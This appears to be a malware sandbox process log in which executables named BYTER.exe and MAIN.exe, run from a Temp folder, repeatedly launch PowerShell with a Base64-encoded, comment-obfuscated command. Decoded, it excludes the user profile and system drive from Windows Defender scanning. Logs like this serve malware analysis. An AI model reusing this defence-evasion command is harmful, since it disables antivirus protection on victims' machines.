"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1784115463-2000515224-1938884843-885390482-930745074148145954-8149088231980488001"
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
